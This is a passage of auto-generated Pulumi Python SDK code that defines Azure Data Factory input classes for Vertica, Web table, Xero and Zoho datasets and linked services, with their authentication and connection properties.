parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Vertica dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'VerticaTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class WebAnonymousAuthenticationArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
url: Any):
"""
A WebLinkedService that uses anonymous authentication to communicate with an HTTP endpoint.
:param pulumi.Input[str] authentication_type: Type of authentication used to connect to the web table source.
:param Any url: The URL of the web service endpoint, e.g. http://www.microsoft.com. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "authentication_type", 'Anonymous')
pulumi.set(__self__, "url", url)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
Type of authentication used to connect to the web table source.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
The URL of the web service endpoint, e.g. http://www.microsoft.com. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@pulumi.input_type
class WebBasicAuthenticationArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
password: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
url: Any,
username: Any):
"""
A WebLinkedService that uses basic authentication to communicate with an HTTP endpoint.
:param pulumi.Input[str] authentication_type: Type of authentication used to connect to the web table source.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password for Basic authentication.
:param Any url: The URL of the web service endpoint, e.g. http://www.microsoft.com. Type: string (or Expression with resultType string).
:param Any username: User name for Basic authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "authentication_type", 'Basic')
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "url", url)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
Type of authentication used to connect to the web table source.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
The password for Basic authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
The URL of the web service endpoint, e.g. http://www.microsoft.com. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def username(self) -> Any:
"""
User name for Basic authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Any):
pulumi.set(self, "username", value)
@pulumi.input_type
class WebClientCertificateAuthenticationArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
password: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
pfx: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
url: Any):
"""
A WebLinkedService that uses client-certificate-based authentication to communicate with an HTTP endpoint. This scheme follows mutual authentication; the server must also provide valid credentials to the client.
:param pulumi.Input[str] authentication_type: Type of authentication used to connect to the web table source.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for the PFX file.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] pfx: Base64-encoded contents of a PFX file.
:param Any url: The URL of the web service endpoint, e.g. http://www.microsoft.com. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "authentication_type", 'ClientCertificate')
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "pfx", pfx)
pulumi.set(__self__, "url", url)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
Type of authentication used to connect to the web table source.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
Password for the PFX file.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def pfx(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
Base64-encoded contents of a PFX file.
"""
return pulumi.get(self, "pfx")
@pfx.setter
def pfx(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "pfx", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
The URL of the web service endpoint, e.g. http://www.microsoft.com. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@pulumi.input_type
class WebLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
type_properties: pulumi.Input[Union['WebAnonymousAuthenticationArgs', 'WebBasicAuthenticationArgs', 'WebClientCertificateAuthenticationArgs']],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Web linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Union['WebAnonymousAuthenticationArgs', 'WebBasicAuthenticationArgs', 'WebClientCertificateAuthenticationArgs']] type_properties: Web linked service properties.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'Web')
pulumi.set(__self__, "type_properties", type_properties)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="typeProperties")
def type_properties(self) -> pulumi.Input[Union['WebAnonymousAuthenticationArgs', 'WebBasicAuthenticationArgs', 'WebClientCertificateAuthenticationArgs']]:
"""
Web linked service properties.
"""
return pulumi.get(self, "type_properties")
@type_properties.setter
def type_properties(self, value: pulumi.Input[Union['WebAnonymousAuthenticationArgs', 'WebBasicAuthenticationArgs', 'WebClientCertificateAuthenticationArgs']]):
pulumi.set(self, "type_properties", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class WebTableDatasetArgs:
def __init__(__self__, *,
index: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
path: Optional[Any] = None,
structure: Optional[Any] = None):
"""
The dataset points to an HTML table in the web page.
:param Any index: The zero-based index of the table in the web page. Type: integer (or Expression with resultType integer), minimum: 0.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any path: The relative URL to the web page from the linked service URL. Type: string (or Expression with resultType string).
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "index", index)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'WebTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if path is not None:
pulumi.set(__self__, "path", path)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter
def index(self) -> Any:
"""
The zero-based index of the table in the web page. Type: integer (or Expression with resultType integer), minimum: 0.
"""
return pulumi.get(self, "index")
@index.setter
def index(self, value: Any):
pulumi.set(self, "index", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def path(self) -> Optional[Any]:
"""
The relative URL to the web page from the linked service URL. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[Any]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class XeroLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
consumer_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
private_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Xero Service linked service.
:param Any host: The endpoint of the Xero server (e.g. api.xero.com).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] consumer_key: The consumer key associated with the Xero application.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] private_key: The private key from the .pem file that was generated for your Xero private application. You must include all the text from the .pem file, including the Unix line endings (\n).
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Xero')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if consumer_key is not None:
pulumi.set(__self__, "consumer_key", consumer_key)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if private_key is not None:
pulumi.set(__self__, "private_key", private_key)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter
def host(self) -> Any:
"""
The endpoint of the Xero server (e.g. api.xero.com).
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="consumerKey")
def consumer_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The consumer key associated with the Xero application.
"""
return pulumi.get(self, "consumer_key")
@consumer_key.setter
def consumer_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "consumer_key", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="privateKey")
def private_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The private key from the .pem file that was generated for your Xero private application. You must include all the text from the .pem file, including the Unix line endings (\n).
"""
return pulumi.get(self, "private_key")
@private_key.setter
def private_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "private_key", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class XeroObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Xero Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'XeroObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class ZohoLinkedServiceArgs:
def __init__(__self__, *,
endpoint: Any,
type: pulumi.Input[str],
access_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Zoho server linked service.
:param Any endpoint: The endpoint of the Zoho server (e.g. crm.zoho.com/crm/private).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_token: The access token for Zoho authentication.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "endpoint", endpoint)
pulumi.set(__self__, "type", 'Zoho')
if access_token is not None:
pulumi.set(__self__, "access_token", access_token)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter
def endpoint(self) -> Any:
"""
The endpoint of the Zoho server (e.g. crm.zoho.com/crm/private).
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Any):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="accessToken")
def access_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The access token for Zoho authentication.
"""
return pulumi.get(self, "access_token")
@access_token.setter
def access_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "access_token", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class ZohoObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
